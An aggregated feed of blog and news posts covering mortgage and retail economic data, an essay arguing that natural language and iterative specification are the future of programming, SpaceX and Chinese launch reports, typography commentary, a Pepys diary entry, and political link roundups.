The average contract interest rate for 30-year fixed-rate mortgages with conforming loan balances ($806,500 or less) increased to 6.38 percent from 6.33 percent, with points increasing to 0.62 from 0.60 (including the origination fee) for 80 percent loan-to-value ratio (LTV) loans.
emphasis added
Mortgage Purchase Index Click on graph for larger image.

The first graph shows the MBA mortgage purchase index.

According to the MBA, purchase activity is up 13% year-over-year unadjusted. 

Red is a four-week average (blue is weekly).  

Purchase application activity is still depressed, but solidly above the lows of 2023 and above the lowest levels during the housing bust.  

Mortgage Refinance Index
The second graph shows the refinance index since 1990.

The refinance index increased from the bottom as mortgage rates declined, but is down from the recent peak in September.

What should I ask Joanne Paul?

Yes I will be doing a Conversation with her.  From the Google internet:

Joanne Paul is a writer, broadcaster, consultant, and Honorary Senior Lecturer in Intellectual History at the University of Sussex. A BBC/AHRC New Generation Thinker, her research focuses on the intellectual and cultural history of the Renaissance and Early Modern periods…

She has a new book out Thomas More: A Life.

Here is her home page.  Here is Joanne on Twitter.  She has many videos on the Tudor period, some with over one million views.

So what should I ask her?

The post What should I ask Joanne Paul? appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

How harmful is the decline in long-form reading?

That is the theme of my latest Free Press column, here is one excerpt:

Oral culture, in contrast, tends to be more fluid, harder to evaluate and verify, more prone to rumor, and it has fewer gatekeepers. Those features have their advantages, as a good stand-up comedian will get louder laughs than a witty author. Or an explanation from YouTube, with moving visuals, may stick in our minds more than a turgid passage from a textbook. We also just love talking, and listening, as those modes of communication reach back into human history much further than reading and writing do. Speech is part of how we bond with each other. Still, if any gross generalization can be made, it is that oral culture makes objectivity and analytic thought harder to establish and maintain.

Given this background, both the good and the bad news is that the dominance of print culture has been in decline for a long time. Radio and cinema both became major communications media in the 1920s, and television spread in the 1950s. Those major technological advances have commanded the regular attention of billions, and still do so. Earlier in the 20th century, it suddenly became a question whether you take your ideas from a book or from the radio. And this was not always a welcome development, as Hitler’s radio speeches persuaded more Germans than did his poorly constructed, unreadable Mein Kampf.

The fact that books, newspapers, and reading still are so important reflects just how powerful print has been. How many other institutions can be in relative decline for over a hundred years, and still have such a hold over our hearts and minds?

The optimistic interpretation of our situation is that reading longer works has been in decline for a long time, and overall our civilization has managed the transition fairly well. Across history we have had various balances of written and oral cultures, and if some further rebalancing is required in the direction of the oral, we should be able to make that work, just as we have done in the past. The rise of television, whatever you may think of it, did not do us in.

A second and more pessimistic diagnosis is that print and reading culture has been hanging by a thread, and current and pending technological advances are about to give that thread its final cut. The intellectual and cultural apocalypse is near. Even if your family thinks of itself as well-educated, your kids will grow up unable to work their way through a classic novel. They will watch the Lord of the Rings movies, but never pick up the books. As a result, they are likely to have less scientific and analytic objectivity, and they will embody some of the worst and most volatile aspects of TikTok culture. They will, however, be able to sample large numbers of small bits of information, or sometimes misinformation, in a short period of time.

There is much more at the link.

The post How harmful is the decline in long-form reading? appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

If we were all Japanese pond frogs, we’d have nothing to fear from murder hornets. “When I watched the recorded videos in slow motion, the frogs were clearly stung multiple times yet showed no apparent injury or mortality.”

💬 Join the discussion on kottke.org

“The Trump administration’s vision for the United States is one of a white Christian nation. And the path to accomplish it is through the exclusion and removal of all who do not fit that vision — in other words, through ethnic cleansing.”

The $4.3 billion space telescope Trump tried to cancel is now complete

A few weeks ago, technicians inside a cavernous clean room in Maryland made the final connection to complete assembly of NASA’s Nancy Grace Roman Space Telescope.

Parts of this new observatory, named for NASA’s first chief astronomer, recently completed a spate of tests to ensure it can survive the shaking and intense sound of a rocket launch. Engineers placed the core of the telescope inside a thermal vacuum chamber, where it withstood the airless conditions and extreme temperature swings it will see in space.

Then, on November 25, teams at NASA’s Goddard Space Flight Center in Greenbelt, Maryland, joined the inner and outer portions of the Roman Space Telescope. With this milestone, NASA declared the observatory complete and on track for launch as soon as fall 2026.

Read full article

Comments

On the success of 'natural language programming'

On the success of ‘natural language programming’

Specifications, in plain speech.

I believe that specification is the future of programming.

Over the last four decades, we’ve seen the practice of building programs, and software systems grow closer and closer to the practice of specification. Details of the implementation, from layout in memory and disk, to layout in entire data centers, to algorithm and data structure choice, have become more and more abstract. Most application builders aren’t writing frameworks, framework builders aren’t building databases, database builders aren’t designing protocols, protocol designers aren’t writing kernels, and so on. Our modern software world is built on abstractions.

Significant advancements are made, from time to time, by cutting through these abstractions. But still, the abstractions dominate, and will continue to.

The practice of programming has become closer and closer to the practice of specification. Of crisply writing down what we want programs to do, and what makes them right. The how is less important.

I believe that natural language will form the core of the programming languages of the future.

The Ambiguity Problem

The most common objection to this view is that natural language is ambiguous. It’s exact meaning is potentially unclear, and highly dependent on context. This is a real problem.

For example, in The Bug in Paxos Made Simple, I look at a common bug in implementations of Paxos caused directly by the ambiguity of natural language.

Pointing out this ambiguity isn’t criticizing [Lamport’s] writing, but rather reminding you about how hard it is to write crisp descriptions of even relatively simple distributed protocols in text.

As Lamport says:

Prose is not the way to precisely describe algorithms.

Perhaps the most famous statement of this problem is Dijkstra’s from On the foolishness of “natural language programming”:

When all is said and told, the “naturalness” with which we use our native tongues boils down to the ease with which we can use them for making statements the nonsense of which is not obvious.

Dijkstra’s argument goes beyond merely pointing out ambiguity, and the lack of precision of natural language, but also points out the power of symbolic tools. All of these arguments are true. Reasoning using the symbolic and formal tools of mathematics is indeed powerful. It is tempting to poke holes in this argument by pointing out that most programs don’t need precise specification, and that there’s a large opportunity for natural language to specify those programs. This argument is true, but doesn’t go far enough.

Instead, I argue that ambiguity doesn’t doom natural language programming for one simple reason: almost all programs are already specified in natural language. And always have been.

Where Do Programs Come From?

Programs come from requirements from people, and people specify the need for those programs using that least precise of tools: natural language. We talk to customers, to stake holders, to product managers, and other consumers of our programs and ask them what they want. Sometimes, we’ll get a precise specification, like an OpenAPI spec or an RFC. More often, we’ll get something fuzzy, incomplete, and ambiguous.

That tends to work for two reasons. First, we’ll apply context. Common sense. Our understanding from similar successful projects about the requirements that users have in common. Or maybe even formal compliance requirements. Second, we’ll have a conversation. Hey, I didn’t quite understand your requirement for the daily average, do you want the mean or median? Or can you make it so I don’t lose data even if a machine fails? Software teams and organizations have these conversations continuously.

This is how software is built professionally, how software construction is taught, and how open source and even hobby communities build their systems.

Sometimes, these conversations will become formal. A snippet of code. A SQL query. An example. But most often they’re informal. A conversation. A napkin sketch. Some hand-waving over lunch.

LLMs allow us to include our computers in these conversations.

Specifications are Loops

Vibe coding is the ultimate embodiment of this: building a specification for a program based on a conversation of yes, and and no, but. A closed loop of a developer and an AI model or agent having a conversation about how to drive a code base forward. This conversation is much richer than a simple natural language programming language because of the loop. The loop is where the context is built up, and the magic happens.

Kiro-style spec-driven development is similar. There, the loop is a little more formal, a little less ad-hoc. But the fundamental shape of the conversation is a similar one. Property-based testing adds a little bit of structure to this loop, and helps make sure its ratcheting forward as it goes.

This is, I think, the fundamental think that most of the takes on natural language and programming miss. They think we’re solving a one-hit problem of going from an ambiguous messy, human, specification to a precise and perfect program. They see the trips around the loop as failures. I believe that the trips around the loop are fundamental to the success of the whole enterprise. They’re what we’ve been doing all along.

To quote from the Agile Manifesto, and artifact of a similar time of change in our industry:

Individuals and interactions over processes and tools

The loop is the interaction.

Getting the Answer Right

Now, this answer is easy enough for programs whose results don’t matter all that much. Which is most programs. But there are some cases where precise and exact answers matter a great deal. They could matter because other layers of the system depend on them (as with the safety properties of Paxos), because of legal or compliance requirements, because of security requirements, or for many other reasons. More importantly, it may not be obvious that the current answer is wrong. That another trip around the loop is needed.

What do we do then, huh?

One thing we can do is slip back into symbolic representations. Back to writing Rust, SQL, or TLA+. We shouldn’t see these cases as failures, and should expect to have these tools in our toolbox for the foreseeable future. Using them is not a failure because we’ve mostly avoided the need for them, and gotten the efficiency gains of bringing our programming practice closer to our customers and businesses. Piercing through the layers will always be a thing.

But there’s another, rather tantalizing, direction. Here, let’s turn to a paper by some colleagues of mine A Neurosymbolic Approach to Natural Language Formalization and Verification. Here neurosymbolic refers to the idea that we can effectively combine the ambiguous loosie goosie natural language LLM world with the precise world of symbolic reasoning inside the machine to provide highly accurate results not achievable via either technique. In this case, highly accurate results on policy following based on a natural language specification.

They resolve ambiguities in text by explicitly including the customer (the specifier) in the feedback loop, such as by having the customer review a restatement of the policy:

Manual inspection allows users to review their generated policy model and verify its correctness, similar to code review in software development. Users can examine the policy variables with their types and descriptions, as well as the logical rules themselves.

Here, the policy model could be entirely formal (SMT-LIB), and could be semi-formal in structured natural language. Let me say that back to you to check I got it.

They’re also applying other techniques, like looking for internal inconsistencies in specifications and asking users to proactively resolve them. Humans can also review automatically generated test cases, both at the individual case level and at the property level.

This is, again, the power of the conversation. A specification isn’t created single-shot from the ambiguous language, but rather extracted after some back-and-forth. This seems to me like the programming model of the future. It’s also the one we’ve always used.

Specifications are Context

Once a specification has been developed, it takes on a second life, as a new piece of context that future specifications can refer to. This is a technique as old as computing, and much much older. Once we’ve established a common understanding, whether it’s about what we mean by average or what we mean by authenticated, we can then use those terms in future communication. When we talk to our customers about a feature request, we don’t start from zero every time. Instead, we use our common understanding of the system as-is, and have a short conversation about what changes we want. Just like I don’t provide you directions to the restaurant down the road starting at your birth place.

Back to Dijkstra:

From one gut feeling I derive much consolation: I suspect that machines to be programmed in our native tongues —be it Dutch, English, American, French, German, or Swahili— are as damned difficult to make as they would be to use.

Today, in the year 2025, we’ve built those machines to be programmed in our native tongues. We’ve made significant progress on how to use them, and are seeing significant returns from that effort. There’s more work to learn how to use them efficiently, but there’s no doubt in my mind that we’ll be using them. The future of programming looks like the past of programming: a natural language conversation, a feedback loop, with the occasional descent into mathematical precision.

When we succeed, we’ll bring the power of computing to more places, more people, and more problems. I can’t wait to see where we go from here.

SpaceX flies Starlink mission using Falcon 9 booster flying for a 30th time

A SpaceX Falcon 9 rocket lifts off from Launch Complex 39A at NASA’s Kennedy Space Center to begin the Starlink 6-99 mission on Dec. 17, 2025. Image: Adam Bernstein / Spaceflight Now

Update Dec. 17, 6:30 p.m. EST (2330 UTC): Adding comments from SpaceX’s vice president of launch.

For the third time, SpaceX launched one of its Falcon 9 rocket boosters on a 30th flight, continuing along the path to certifying its rockets for use up to 40 times.

The nine Merlin 1D engines at the base of the booster, tail number 1063, roared to life at 7:27 a.m. PST (10:27 a.m. EST / 1527 UTC) Wednesday morning. The flight from Vandenberg Space Force Base in California was the second out of two planned flights that day, following a launch from NASA’s Kennedy Space Center in Florida that launched less than two hours prior at 8:42 a.m. EST (1342 UTC).

Taking a south-easterly trajectory upon leaving the launch pad, B1063 separated from the rocket’s upper stage less than three minutes into the mission. About six minutes later it was standing atop the SpaceX drone ship, ‘Of Course I Still Love You’, positioned in the Pacific Ocean.

SpaceX has at least one more launch scheduled from Vandenberg before the end of the year. On Dec. 27, it’s slated to launch the COSMO-SkyMed Second Generation mission for the Italian Ministry of Defence and the Italian Space Agency.

Assuming no other launches crop up before the new year, SpaceX will close out 2025 with a total of 167 Falcon 9 rocket launches. This was affirmed Wednesday evening in a social media post from Kiko Dontchev, SpaceX Vice President of Launch.

Wednesday: Architecture Billings Index

Mortgage Rates Note: Mortgage rates are from MortgageNewsDaily.com and are for top tier scenarios.

Wednesday:
• At 7:00 AM ET, The Mortgage Bankers Association (MBA) will release the results for the mortgage purchase applications index.

• During the day: The AIA's Architecture Billings Index for November (a leading indicator for commercial real estate).

Links 12/16/25

Links for you. Science:

The U.S. Is Funding Fewer Grants in Every Area of Science and Medicine
FDA’s big change to how vaccines will get approved
Colorado has wolves again for the first time in 80 years. Why are they dying?
‘The last plant left’: can Rapa Nui’s extinct tree be resurrected?
Rare Gecko Species Rediscovered in Galapagos Following Island Restoration Success
Diabetic Man With Gene-Edited Cells Produces His Own Insulin—No Transplant Drugs Required
Cancelling mRNA studies is the highest irresponsibility

Other:

It’s time to talk about Donald Trump’s health (again)
This is what a white supremacist administration looks like
Janeese Lewis George launches bid for D.C. mayor. The progressive lawmaker has big plans, but faces political and practical obstacles.
The Conservative Grievance Business Is Always Hiring
FBI under Kash Patel has become ‘internally paralyzed by fear’, new report reveals
Republican mayor in Kansas facing deportation over voter fraud
Why This Nineties High School Punk Band Is Suddenly Bigger Than Ever. Everyone Asked About You broke up and went about their lives. Nearly three decades later, they’re touring the U.S. thanks to some Japanese fans unearthing their old teenage music
Suspended FEMA workers who criticized Trump administration got their jobs back — until DHS leaders found out
UAB physician and AI innovator may leave US due to parents’ immigration limbo
D.C. restaurants, hotels suffered during Trump takeover, per new data
DOGE Isn’t Dead. Here’s What Its Operatives Are Doing Now
A Maryland mayor removes rainbow crosswalks, citing neutrality concerns (“A conservative, Taylor is a bit of an outlier in Salisbury. He won the 2023 mayoral race by 50 votes when two more liberal-leaning candidates split their votes.”)
I’m In Charge
12-Story Micro-Unit Development Pitched For 15th Street Church
Changing the FDA’s Vaccine Approval Process Could Threaten COVID, Flu Protection for Children
N.Y. Law Could Set Stage for A.I. Regulation’s Next ‘Big Battleground’
Trump tariffs gut manufacturing as jobs shrink for 9 months straight
Trump Boat Bombings Suddenly on Shakier Ground as Damning Info Emerges
Olivia Nuzzi’s Tell-Nothing Memoir (brutal)
Trump’s ugly Thanksgiving meltdown: It’s getting so bad that even Republicans are starting to notice.
Grok Says It Would Kill Every Jewish Person on the Planet to Save Elon Musk: A “classic trolley problem,” according to Grok.
A Serious Journalism Scandal Hiding Inside a Frivolous Sexual One
Settler outposts spread among West Bank villages and fuel fear of more attacks
Dem. Senator Gallego’s Leaked Texts Echo Far-Right Gender Panic And Misogyny (more here)
Yeah, what is ‘Post-Liberalism’ anyway?
The old deal is dead. America needs a new one
Kash Patel Is Under Investigation for Using FBI Jet as Private Uber
ICE Arrested and Separated Chinese Father From 6-Year-Old Son, Advocates Say
How the CIA Learned to Stop Worrying and Embrace Partisanship
Way-No-No-No!!! Drives Into Police Standoff

So Mean and Petty

I was going to publish a post today about the pettiness of the Trump administration is best illustrated by deadnaming a trans former HHS official*. No, it’s not as dangerous (or deadly) as other Trump administration actions, but it’s the kind of thing for which someone should be named and shamed. And then, Sunday night Trump uttered a vile and disgusting statement–which arguably could be viewed as a violent threat too–about Rob and Michelle Reiner’s death.

If there’s any consolation to be had, this seems to be blowing up in Trump’s face, though that didn’t stop him from doubling down yesterday. There might be a level of meanness and pettiness that the body politic just can’t ignore or stomach. While Trump obviously sets the tone, as the deadnaming indicates, this malignant behavior is marbled throughout the entire Trump administration, and those involved in such foul behavior should be shamed and made outcast (even if it’s not illegal). There is no balm in Gilead to heal those sin sick souls.

Anyway, here’s a funny sketch featuring Rob Reiner and Carroll O’Connor (apparently, it was at least partially improvised):

*I delayed writing about that because I was going to write about the Trump administration’s cancelling plans from the Biden administration to mint quarters about abolition (of slavery) and women’s suffrage. Being assholes happens like clockwork for these putzes.

Tuesday 16 December 1662

Up and to the office, and thither came Mr. Coventry and Sir G. Carteret, and among other business was Strutt’s the purser, against Captn. Browne, Sir W. Batten’s brother-in-law, but, Lord! though I believe the Captain has played the knave, though I seem to have a good opinion of him and to mean him well, what a most troublesome fellow that Strutt is, such as I never did meet with his fellow in my life. His talking and ours to make him hold his peace set my head off akeing all the afternoon with great pain.

So to dinner, thinking to have had Mr. Coventry, but he could not go with me; and so I took Captn. Murford. Of whom I do hear what the world says of me; that all do conclude Mr. Coventry, and Pett, and me, to be of a knot; and that we do now carry all things before us; and much more in particular of me, and my studiousnesse, &c., to my great content.

After dinner came Mrs. Browne, the Captain’s wife, to see me and my wife, and I showed her a good countenance, and indeed her husband has been civil to us, but though I speak them fair, yet I doubt I shall not be able to do her husband much favour in this business of Strutt’s, whom without doubt he has abused.

So to the office, and hence, having done some business, by coach to White Hall to Secretary Bennet’s, and agreed with Mr. Lee to set upon our new adventure at the Tower to-morrow. Hence to Col. Lovelace in Cannon Row about seeing how Sir R. Ford did report all the officers of the navy to be rated for the Loyal Sufferers, but finding him at the Rhenish wine-house I could not have any answer, but must take another time. Thence to my Lord’s, and having sat talking with Mr. Moore bewailing the vanity and disorders of the age, I went by coach to my brother’s, where I met Sarah, my late mayde, who had a desire to speak with me, and I with her to know what it was, who told me out of good will to me, for she loves me dearly, that I would beware of my wife’s brother, for he is begging or borrowing of her and often, and told me of her Scallop whisk, and her borrowing of 50s. for Will, which she believes was for him and her father. I do observe so much goodness and seriousness in the mayde, that I am again and again sorry that I have parted with her, though it was full against my will then, and if she had anything in the world I would commend her for a wife for my brother Tom. After much discourse and her professions of love to me and all my relations, I bade her good night and did kiss her, and indeed she seemed very well-favoured to me to-night, as she is always.

So by coach home and to my office, did some business, and so home to supper and to bed.

Read the annotations

SpaceX launches Wednesday morning Starlink mission from Kennedy Space Center

A SpaceX Falcon 9 rocket lifts off from Launch Complex 39A at NASA’s Kennedy Space Center to begin the Starlink 6-99 mission on Dec. 17, 2025. Image: Adam Bernstein / Spaceflight Now

Update Dec. 17, 10:20 a.m. EST (1520 UTC): SpaceX confirms deployment of the Starlink satellites.

SpaceX completed the first of a planned pair of midweek, morning launches from its pads in both Florida and California.

Up first was the Starlink 6-99 mission, which added 29 more broadband internet satellites to SpaceX’s low Earth orbit constellation. According to astronomer and expert orbital tracker, there are currently more than 9,300 Starlink satellites in orbit.

Liftoff from Launch Complex 39A at NASA’s Kennedy Space Center happened at 8:42 a.m. EST (1342 UTC). The rocket took a south-easterly path away from Florida’s Space Coast.

The 45th Weather Squadron forecast a 95 percent chance for favorable odds of good weather at liftoff. Meteorologists said the booster recovery weather may not be ideal for a landing though.

“High pressure over the southeastern states will persist before the next cold front is expected to pass through by Friday,” launch weather officers wrote. “No change to the primary launch window forecast, with low chances of Cumulus Cloud Rule violation associated with isolated onshore-moving low-topped coastal showers.

SpaceX launched the mission using the Falcon 9 first stage booster with the tail number, 1094. This was its sixth flight after launching missions like Crew-11, Ax-4 and Cygnus NG-23.

Nearly 8.5 minutes after liftoff, B1094 performed an autonomous landing on the drone ship, ‘Just Read the Instructions,’ positioned in the Atlantic Ocean to the east of The Bahamas. This was the 146th landing on this vessel and the 552nd booster landing for SpaceX to date.

A SpaceX Falcon 9 rocket lifts off from Launch Complex 39A at NASA’s Kennedy Space Center to begin the Starlink 6-99 mission on Dec. 17, 2025. Image: Adam Bernstein / Spaceflight Now

Podcast with Parker Conley

About “learning, history, and investing in ideas”, and what if there were ten Tyler Cowens?:

Here is the transcript.

The post Podcast with Parker Conley appeared first on Marginal REVOLUTION.

       

Comments

 

The O'Saasy License

One of my favorite parts of the early web was how easy it was to see how the front-end was built. Before View Source was ruined by minification, transpiling, and bundling, you really could just right-click on any web page and learn how it was all done. It was glorious.

But even back then, this only ever applied to the front-end. At least with commercial applications, the back-end was always kept proprietary. So learning how to write great web applications still meant piecing together lessons from books, tutorials, and hello-world-style code examples, not from production-grade commercial software.

The O'Saasy License seeks to remedy that. It's basically the do-whatever-you-want MIT license, but with the commercial rights to run the software as a service (SaaS) reserved for the copyright holder, thus encouraging more code to be open source while allowing the original creators to see a return on their investment.

We need more production-grade code to teach juniors and LLMs alike. A view source that extends to the back-end along with the open source invitation to fix bugs, propose features, and run the system yourself for free (if your data requirements or interests maks that a sensible choice over SaaS).

This is what we're doing with Fizzy, but now we've also given the O'Saasy License a home to call its own at osaasy.dev. The license is yours to download and apply to any project where it makes sense. I hope to read a lot more production-grade SaaS code as a result!

osassy-license.png

SpaceX claims close approach to Starlink satellite by payload from Chinese launch

Kinetica-1 launch Dec 2025

A reported close approach between a Starlink satellite and a recently launched Chinese spacecraft highlights the challenges of coordinating spacecraft operations and verifying potential close calls in orbit.

The post SpaceX claims close approach to Starlink satellite by payload from Chinese launch appeared first on SpaceNews.

China launches experimental cargo spacecraft, opaque tech demo mission and remote sensing satellite

A Long March 4B lifts off carrying the Ziyuan-3 (04) remote sensing satellite, Dec. 16 (UTC), 2025, climbing above the snow-dusted hills surrounding Taiyuan spaceport.

China conducted a pair of launches in recent days, sending a commercial cargo spacecraft and tech demo into orbit, followed by a remote sensing satellite.

The post China launches experimental cargo spacecraft, opaque tech demo mission and remote sensing satellite appeared first on SpaceNews.

MAVEN telemetry shows changes to spacecraft orbit and rotation

New analysis suggests that problems with NASA’s MAVEN Mars orbiter may be more serious than a simple communications glitch.

The post MAVEN telemetry shows changes to spacecraft orbit and rotation appeared first on SpaceNews.

How the Space Force trains Guardians for the future of warfare

Brig. Gen. Nick Hague

In this episode of Space Minds, host Sandra Erwin sits down with former NASA astronaut and Space Force leader Brig. Gen. Nick Hague for a wide-ranging conversation on how the U.S. Space Force is shaping its culture, training Guardians, and preparing for future conflict in space.

The post How the Space Force trains Guardians for the future of warfare appeared first on SpaceNews.

Trump’s national security strategy ignores space

Trump Isaacman

The Trump administration’s new national security strategy has rightly drawn criticism for presuming to tell our European allies how to arrange their domestic affairs. Equally as baffling is its near silence on a genuine United States national security concern — bolstering our offensive and defensive capabilities in space. Amid much MAGA trollery that blames Europe […]

The post Trump’s national security strategy ignores space appeared first on SpaceNews.

Vantor partners with Niantic Spatial on GPS-free navigation for defense market

Firms aim to link air and ground platforms using visual positioning technology

The post Vantor partners with Niantic Spatial on GPS-free navigation for defense market appeared first on SpaceNews.

EraDrive raises $5.3 million for software-hardware kits to enhance satellite autonomy

SAN FRANCISCO – EraDrive, a Stanford University spinoff developing software and hardware for satellite autonomy, raised $5.3 million in an oversubscribed seed round, the startup announced Dec. 16. “EraDrive is very much about this idea of the self-driving spacecraft,” Justin Kruger, EraDrive chief technology officer and co-founder, told SpaceNews. EraDrive is developing a software-hardware module […]

The post EraDrive raises $5.3 million for software-hardware kits to enhance satellite autonomy appeared first on SpaceNews.

[Sponsor] Finalist Daily Planner for iOS

Finalist is an iOS planner rooted in paper. Originally an index card system, it grew into a love letter to paper planners. You know the kind, leather folders with colored tabs and translucent dividers.

Unlike those old binders, Finalist fills itself with your calendars, reminders and weather forecast. Minimalist? Maybe not, but it’s become a UI playground designed to inspire, and looks great on iPad and Mac too.

Like the gorgeous new Year Planner for roughing in plans with the Highlighter (“intention paintbrush”).

iOS has tons of cool productivity apps. Finalist is a different take, and it might just end up in your dock.

 ★ 

‘A Brief History of Times New Roman’

One more from Matthew Butterick, from his Typography for Lawyers, and a good pairing with Mark Simonson’s “The Scourge of Arial”:

Yet it’s an open question whether its longevity is attributable to its quality or merely its ubiquity. Helvetica still inspires enough affection to have been the subject of a 2007 documentary feature. Times New Roman, meanwhile, has not attracted similar acts of homage.

Why not? Fame has a dark side. When Times New Roman appears in a book, document, or advertisement, it connotes apathy. It says, “I submitted to the font of least resistance.” Times New Roman is not a font choice so much as the absence of a font choice, like the blackness of deep space is not a color. To look at Times New Roman is to gaze into the void.

As Simonson mentions in “The Scourge of Arial”, regarding Helvetica’s enduring popularity:

As it spread into the mainstream in the ’70s, many designers tired of it and moved on to other typographic fashions, but by then it had become a staple of everyday design and printing. So in the early ’80s when Adobe developed the PostScript page description language, it was no surprise that they chose Helvetica as one of the basic four fonts to be included with every PostScript interpreter they licensed (along with Times, Courier, and Symbol). Adobe licensed its fonts from the original foundries, demonstrating their respect and appreciation for the integrity of type, type foundries and designers. They perhaps realized that if they had used knock-offs of popular typefaces, the professional graphic arts industry — a key market — would not accept them.

To my mind, Helvetica, Times, and Courier are the three canonical “default” fonts. One modern sans, one modern serif, and one for “typewriter”/code. (When I see Courier in print, at display sizes, my mind immediately wonders if the printer was missing the font that the designer specified in the document file.)

The Symbol font is a different story. It existed and was included with PostScript as one of just four defaults because the 8-bit character encodings of the time only had space for 255 characters. You needed a special font like Symbol to access “exotic” characters like Greek letters, math symbols (e.g. × or ÷), or arrows (↑ ↓ ← →). So there were really only three regular “fonts”, for prose, included with PostScript: Helvetica, Courier, and Times.

Courier and Times were eventually superseded in popular use by rivals that Microsoft licensed for inclusion in Windows: Courier New and Times New Roman, respectively. Times was from Linotype, Times New Roman from Monotype. Both versions of Times are legitimate digital interpretations of the 1929 hot metal design of Times Roman, and their differences are minor. Courier New, on the other hand, is so ugly — anemically thin and weak — that it hurts my teeth whenever I encounter it.

 ★ 

‘The Scourge of Arial’

Typographer Mark Simonson, all the way back in 2001:

Arial is everywhere. If you don’t know what it is, you don’t use a modern personal computer. Arial is a font that is familiar to anyone who uses Microsoft products, whether on a PC or a Mac. It has spread like a virus through the typographic landscape and illustrates the pervasiveness of Microsoft’s influence in the world.

Arial’s ubiquity is not due to its beauty. It’s actually rather homely. Not that homeliness is necessarily a bad thing for a typeface. With typefaces, character and history are just as important. Arial, however, has a rather dubious history and not much character. In fact, Arial is little more than a shameless impostor.

This is the exegesis on Arial. There’s also an exemplary illustrated sidebar, “How to Spot Arial”, which shows in detail how to tell the fucking bastard from Helvetica. If you want to be like me, cursed to notice Arial each time it appears in life, study that, and take note how every single way that it’s different from Helvetica is in the direction of making it uglier.

I’ve referenced “The Scourge of Arial” a few times over the years here at DF, but the recent contretemps over Times New Roman’s return at the US State Department has the general topic of “default fonts” at top of mind. For me, at least.

One of the old posts in which I linked to “The Scourge of Arial” was this gem from September 2007: “Hacking the iPhone Notes App for the Admittedly Nit-Picky Purpose of Changing the Text Font to Helvetica”. This was so early in the iPhone era — just three months after the original iPhone shipped — that we were calling its operating system “mobile OS X”, and none of it was protected in any way, so you could do what I did and delete the Marker Felt font (Merlin Mann: “Comic Sans with a shave and a breath mint”) and then use a hex editor to modify the Mobile Notes app so it would fall back to Helvetica instead of cursed Arial after Marker Felt was deleted. Good times.

 ★ 

A Note on Current SMS Marketing Practices

Back on November 28, I bought a new cap from New Era’s web store. They offered a discount of some sort if I gave them a phone number and permitted them to send me marketing messages. That got me curious about what they’d do with my number, and it was a $50-some dollar cap, so I took the discount and gave them my Google Voice number. That was 17 days ago. They sent me 19 SMS marketing messages since then, before I’d seen enough today and called it quits on this experiment. (Or called “STOP”, perhaps, which was the magic word to opt out.) They didn’t send a text every day, and on some days, they sent more than one. But the overall effect was relentlessly annoying.

I’m sure some of the people who sign up for these texts in exchange for a discount code wind up clicking at least one of the offers sent via SMS and buying more stuff, and the marketing team running this points to those sales as proof that it “works”. You can measure that. It shows up as a number. Some people in business only like arguments that can be backed by numbers. 3 is more than 2. That is indeed a fact.

But there are an infinite number of things in life that cannot be assigned numeric values. Many of these things matter too. Like the fact that in my mind, after experiencing this, the New Era company smells like a sweaty hustler in a cheap polyester suit. If their brand were a man, I’d check my pants pocket for my wallet after interacting with him.

 ★ 

Tuesday assorted links

1. The new Brink Lindsey book is out.

2. Markets in everything: “Wasp nests have become a surprisingly sought-after home décor commodity, with some priced at up to $250 per specimen.” (NYT)  The shipping fees to get them can be pretty high.

3. New charter city, crypto-based in St. Kitts and Nevis? (FT)

4. “Specifically, TGIF, Nellie Bowles’ witty take on the week’s news, is being censored in the UK.” (TFP, beware Australia…)

5. A case where the Peltzman effect might apply.

6. Glenn Loury in memory of Thomas Schelling.

7. Purdue University Approves New AI Requirement For All Undergrads.

8. Robert J. Samuelson, RIP (NYT).

The post Tuesday assorted links appeared first on Marginal REVOLUTION.

       

Comments

 

Part 2: Current State of the Housing Market; Overview for mid-December 2025

Today, in the Calculated Risk Real Estate Newsletter: Part 2: Current State of the Housing Market; Overview for mid-December 2025

A brief excerpt:
Yesterday, in Part 1: Current State of the Housing Market; Overview for mid-December 2025 I reviewed home inventory and sales. I noted that the key stories this year for existing homes are that inventory increased sharply (almost back to pre-pandemic levels), and sales are depressed and tracking last year (sales in 2024 were the lowest since 1995). That means prices are under pressure.

In Part 2, I will look at house prices, mortgage rates, rents and more.
...
Case-Shiller House Prices Indices The Case-Shiller National Index increased 1.3% year-over-year (YoY) in September and will likely be about the same year-over-year in the October report compared to September (based on other data).
...
In the January report, the Case-Shiller National index was up 4.2%, in February up 4.0%, in March up 3.4%, in April report up 2.8%, in May up 2.3%, in June up 1.9% in July up 1.6%, August up 1.6% and in September up 1.3% (a steady decline in the YoY change).

And the September Case-Shiller index was a 3-month average of closing prices in July, August and September. July closing prices include some contracts signed in May. So, not only is this trending down, but there is a significant lag to this data.
There is much more in the article.

Retail Sales Unchanged in October

On a monthly basis, retail sales were unchanged from September to October (seasonally adjusted), and sales were up 3.5 percent from October 2024.

From the Census Bureau report:
Advance estimates of U.S. retail and food services sales for October 2025, adjusted for seasonal variation and holiday and trading-day differences, but not for price changes, were $732.6 billion, virtually unchanged from the previous month, and up 3.5 percent from October 2024. ... The August 2025 to September 2025 percent change was revised from up 0.2 percent to up 0.1 percent.
emphasis added
Retail Sales Click on graph for larger image.

This graph shows retail sales since 1992. This is monthly retail sales and food service, seasonally adjusted (total and ex-gasoline).

Retail sales ex-gasoline was up 0.1% in October.

The second graph shows the year-over-year change in retail sales and food service (ex-gasoline) since 1993.

Retail and Food service sales, ex-gasoline, increased by 3.6% on a YoY basis.

Year-over-year change in Retail Sales The change in sales in October were below expectations and the previous two months were revised down.

A weak report.

Comments on November Employment Report

The headline jobs number in the November employment report was slightly above expectations, however August and September were revised down by 33,000 - and the initial October report indicates 105,000 job lost (mostly Federal Government jobs lost due to DOGE deferred resignation program). The unemployment rate increased to 4.6%.


Average Hourly Wages

WagesThe graph shows the nominal year-over-year change in "Average Hourly Earnings" for all private employees from the Current Employment Statistics (CES).  

There was a huge increase at the beginning of the pandemic as lower paid employees were let go, and then the pandemic related spike reversed a year later.

Wage growth has trended down after peaking at 5.9% YoY in March 2022 and was at 3.5% YoY in November, down from 3.7% YoY in October. 

Part Time for Economic Reasons

Part Time WorkersFrom the BLS report:
"The number of people employed part time for economic reasons was 5.5 million in November, an increase of 909,000 from September. These individuals would have preferred full-time employment but were working part time because their hours had been reduced or they were unable to find full-time jobs."
The number of persons working part time for economic reasons increased in November to 5.49 million from 4.58 million in September.  This is well above the pre-pandemic levels and the highest levels since mid-2021.

